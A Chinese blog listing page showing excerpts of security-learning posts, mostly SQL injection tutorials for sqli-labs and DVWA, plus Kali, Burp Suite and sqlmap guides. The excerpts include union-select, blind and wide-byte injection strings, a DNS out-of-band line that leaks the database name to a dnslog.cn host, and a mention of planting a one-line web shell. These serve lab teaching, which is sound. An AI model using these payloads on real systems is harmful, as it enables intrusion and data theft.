自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

公众号:爱国小白帽

更好都不行,我只做最好,来自处女座博主的态度

原创 Python自学篇——你需要的模块(库)没有应该怎么办?

此乃本人学习Python时经常会遇到的问题,亲测有效,如有遗漏还望各位大佬补充 如果你想实现某项功能却又不知道该用哪个模块(库)可以参考以下文章 500个Python模块(库)的详细分类介绍 调用的模块(库)没有会出现红线,下列两种解决办法 一、在设置中找到Project Interprete...

2020-01-31 18:49:44 9702 7

原创 kali查看系统信息及已安装软件包的常用命令汇总

1.系统 uname -a 查看内核/操作系统/CPU信息 head -n 1 /etc/issue 查看操作系统版本 cat /proc/cpuinfo 查看CPU信息 hostname 查看计算机名 lspci -tv 列出所有PCI设备 lsusb -tv 列出所有...

2020-01-30 18:23:40 4669 4

原创 Linux自学篇——实现流量监控的几种方法

1.sar -n DEV 1 2 sar命令包含在sysstat工具包中,提供系统的众多统计数据。其在不同的系统上命令有些差异,某些系统提供的sar支持基于网络接口的数据统计,也可以查看设备上每秒收发包的个数和流量。 1 sar –n DEV 1 2 命令后面1 2 意思是:每一秒钟取1次...

2020-01-27 12:50:54 1339 1

原创 500个Python模块(库)的详细分类介绍

常用模块 Chardet-------------字符编码探测器,可以自动检测文本、网页、xml的编码。 colorama------------主要用来给文本添加各种颜色,并且非常简单易用。 Prettytable---------主要用于在终端或浏览器端构建格式化的输出。 difflib...

2020-01-26 16:46:45 2515 2

原创 SQL注入篇——sqlmap安装使用详解

SQL注入篇——注入工具sqlmap使用详解 sqlmap简介 sqlmap是一个开源的渗透测试工具,它自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行...

2020-01-25 11:26:00 5122 4

原创 专注于系统管理的WMIC命令模式

WMIC怎么使用 WMIC命令可以在XP或.NETServer的标准命令行解释器(cmd.exe)、Telnet会话或“运行”对话框中执行。这些启动方法可以在本地使用,也可以通过.NET Server终端服务会话使用。 WMIC的强大之处 可以使用WMIC管理本地或远程多个计算机,并且提供了...

2020-01-20 15:20:40 2616 1

原创 六款高效学习软件——程序员必备

也很适合CSDN博主使用哦

2020-01-17 17:17:56 10907 12

原创 当代程序员一定要知道的《网络安全法》

网络安全是指通过采取必要措施,防范对网络的攻击、入侵、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。 众所周知,在过去的几年间频频有程序员被抓,现在的网络安全服务行业不比以前,有太多我们忽略甚至习以为常的东西其实是违法的。所以现在大...

2020-01-16 17:34:41 6010 7

原创 SQL注入篇——less21-38最详细教程附带隐藏关卡

sql注入基本语句: order by 4 ­­ ­ 判断有多少列 union select 1,2,3 ­­ ­ 判断数据显示点 union select 1,user(),database()­­ ­显示出登录用户和数据库名 union select 1,(select group_c...

2020-01-12 14:56:00 1110 1

原创 当代程序员一定要知道的《网络安全法》

网络安全是指通过采取必要措施,防范对网络的攻击、入侵、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。 众所周知,在过去的几年间频频有程序员被抓,现在的网络安全服务行业不比以前,有太多我们忽略甚至习以为常的东西其实是违法的。所以现在大...

2020-01-11 01:26:18 1016 2

原创 SQL注入篇——sqli-labs最详细1-75闯关指南

使用sqli­labs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqli­labs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­...

2020-01-11 00:37:15 6522 4

原创 SQL注入篇——宽字节注入

注入语句: %DF’ – -

2020-01-09 11:59:11 854 3

原创 SQL注入篇——一句话木马

一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.t...

2020-01-08 20:08:22 1129 0

原创 SQL注入篇——盲注

盲注之布尔类型注入 DVWA平台low级别 一、判断数据库名的长度 1’ and (length(database()))>4# 超出长度会报错 二、获取数据库名的字符 判断每个字母在ASCII码中的范围,最终确定是哪个字母 1’ and (ascii(substr(database()...

2020-01-08 00:12:31 515 1

原创 SQL注入篇——对information_schema数据库的解析

information_schema数据库是个临时数据库,里面的一些信息是随时改变的 其中重要的表有: SCHEMATA表 ---SCHEMATA表提供了所有数据库的信息。 select schema_name from information_schema.schemata; 列出所有数据库——...

2020-01-07 13:09:21 773 0

原创 SQL注入篇——mysql 联合查询注入

SQL注入篇——对information_schema数据库的解析 SQL注入篇——盲注 SQL注入篇——常用注入语句 SQL注入篇——宽字节注入 SQL注入篇——less21-38最详细教程附带隐藏关卡 SQL注入篇——sqli-labs最详细1-75闯关指南 SQL注入篇——注入工...

2020-01-06 21:57:30 1003 3

原创 适合小白看的DOS-CMD终端命令对照表(新增)

注:部分命令只适用于win2000/2003/XP系统 1. gpedit.msc-----组策略   2. sndrec32-------录音机   3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。 它在 Wind...

2020-01-05 22:09:52 1325 2

原创 渗透测试工具Burp Suite使用详解

功能一:Proxy 抓包 点击proxy中的Intercept is on开始抓包,下面为抓到的网页内容,可以随意更改 功能二:Target 目标域设置 1.会在当前目录下显示所有抓过的网站 2.选择一个网站右键选择Remove from scope 3.点击Scopel,会看到上一步选中的网...

2020-01-03 16:21:37 1637 8

提示
确定要删除当前文章?
取消 删除